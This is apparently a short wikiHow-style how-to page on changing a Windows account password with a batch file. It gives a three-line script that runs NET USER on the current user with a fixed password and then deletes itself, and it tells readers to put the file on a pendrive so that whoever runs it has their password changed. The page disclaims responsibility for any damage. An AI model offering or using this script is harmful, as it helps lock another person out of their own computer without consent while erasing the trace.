How to Change Admin Password by Batch Programming
Edited by Ankit Dubey, Shina, Laura
Change one's user password by simple batch program....
EditSteps
-
1Batch programming is very useful in such a task ....write the following code in notepad and save it as any name of your choice but remember that extension should be (.bat) eg. (pwd.bat)
-
2Open your notepad and write this code-------->
- @echo off
- NET USER %username% ankit
- DEL pwd.bat
-
3Now save it as pwd.bat
-
4Your file is ready and you can copy it in one's pendrive and as soon as he execute it, the password will change
EditWarnings
- The author is not responsible for any damage in your computer. Do it at your own risk